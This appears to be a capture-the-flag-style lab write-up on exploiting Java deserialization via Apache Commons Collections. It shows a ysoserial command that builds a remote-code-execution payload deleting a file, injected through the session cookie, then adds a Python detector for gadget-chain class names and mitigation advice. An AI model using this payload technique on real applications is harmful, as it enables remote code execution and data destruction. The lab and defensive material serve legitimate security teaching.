Exploiting Java deserialization with Apache Commons
Task
This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don’t have source code access, you can still exploit this lab using pre-built gadget chains.
To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos’s home directory.
You can log in to your own account using the following credentials: wiener:peter
Solution
You can see your session cookie value starts with rO0, which indicates it’s a base64 encoded Java serialized object (the serialization stream header bytes AC ED 00 05 encode to rO0A in base64). Since you don’t have source code access, a feasible option is to try out pre-built gadget chains.
Download ysoserial. WHY… So… Serial!!!🤡
Install java:
sudo apt install default-jdk
If possible, you should choose an older version like openjdk-11-jdk. In my case, my Debian doesn’t have it in the default APT repositories.
For Java 16+, you need to add the --add-opens options below to run ysoserial:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 | xclip -selection clipboard
URL encode the payload using Decoder or Ctrl+U and replace your session cookie with it. Send a request. Even if the response contains errors, the payload will still do the job: the gadget chain executes while the object is being deserialized, before the application gets as far as using it.
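From the defending side, the same two facts this writeup relies on (the rO0 prefix and the class names a gadget chain drags into the stream) are what a detection rule can key on. The following is an added example, not part of the original writeup or of ysoserial: a small Python checker that URL-decodes and base64-decodes a session cookie, confirms the Java stream header, walks the TC_CLASSDESC markers to list the class names the stream declares, and flags names under Apache Commons Collections or the TemplatesImpl class. The watch list, the helper that builds the sample streams, and the two sample cookies are constructed for this example; the sample streams carry only the header and class descriptors, not complete objects.

```python
import base64
import re
from urllib.parse import quote, unquote

# Java serialization stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Constructed watch list of class-name prefixes seen in well-known gadget chains.
# Extend it from your own dependency inventory; a real deployment should prefer an
# allowlist of the classes the session object legitimately contains.
GADGET_PACKAGE_PREFIXES = (
    "org.apache.commons.collections.",
    "org.apache.commons.collections4.",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
)

# A class descriptor is TC_CLASSDESC (0x72), a 2-byte big-endian length, then the
# class name. The lookahead keeps the scan from skipping bytes after a false hit
# (the letter 'r' inside a name is also 0x72).
_CLASSDESC = re.compile(rb"\x72(?=(?P<len>[\x00-\xff]{2}))")


def decode_session_cookie(cookie_value):
    """URL-decode, drop whitespace (base64 line wraps), then base64-decode.

    Returns the raw bytes, or None if the value is not valid base64."""
    compact = "".join(unquote(cookie_value).split())
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def is_java_serialized(data):
    """True when the decoded bytes start with the Java serialization header."""
    return data is not None and data.startswith(JAVA_STREAM_MAGIC)


def extract_class_names(data):
    """List the class names introduced by TC_CLASSDESC records in the stream."""
    names = []
    for match in _CLASSDESC.finditer(data):
        length = int.from_bytes(match.group("len"), "big")
        # Real class names are short; a length formed from two ASCII letters of a
        # name that happened to contain 'r' is far larger and is dropped here.
        if not 3 <= length <= 512:
            continue
        start = match.end() + 2
        raw = data[start:start + length]
        if len(raw) != length:
            continue
        try:
            name = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        # Accept only names shaped like a Java class or array descriptor.
        if re.fullmatch(r"[\[\w.$;]+", name):
            names.append(name)
    return names


def assess_cookie(cookie_value):
    """Classify a cookie: is it a Java object, and which declared classes look bad?"""
    data = decode_session_cookie(cookie_value)
    if not is_java_serialized(data):
        return {"serialized": False, "classes": [], "suspicious": []}
    classes = extract_class_names(data)
    suspicious = [c for c in classes if c.startswith(GADGET_PACKAGE_PREFIXES)]
    return {"serialized": True, "classes": classes, "suspicious": suspicious}


# --- Constructed sample input (header + class descriptors only) -------------

def _class_desc(name):
    encoded = name.encode("utf-8")
    return b"\x72" + len(encoded).to_bytes(2, "big") + encoded


def _build_stream(class_names):
    body = JAVA_STREAM_MAGIC + b"\x73"  # TC_OBJECT
    for name in class_names:
        # serialVersionUID, class flags and field count are filler here.
        body += _class_desc(name) + b"\x00" * 8 + b"\x02\x00\x00"
    return body


# A session that only declares the application's own (constructed) user class.
BENIGN_COOKIE = base64.b64encode(_build_stream(["lab.User"])).decode()

# A session that drags a Commons Collections 4 transformer into the stream,
# URL-encoded the way it would arrive in a Cookie header.
SUSPICIOUS_COOKIE = quote(base64.b64encode(_build_stream([
    "java.util.HashMap",
    "org.apache.commons.collections4.functors.ChainedTransformer",
])).decode())


if __name__ == "__main__":
    for label, cookie in (("benign", BENIGN_COOKIE), ("suspicious", SUSPICIOUS_COOKIE)):
        print(label, assess_cookie(cookie))
```

This is a triage aid for logs and WAF-style inspection, not a fix: a checker that looks for known bad names can be evaded by a chain it does not list. The actual mitigation for the application is to stop deserializing untrusted input for sessions, or at minimum to install an allowlisting ObjectInputFilter (JEP 290) so that anything outside the session's own classes is rejected before readObject runs.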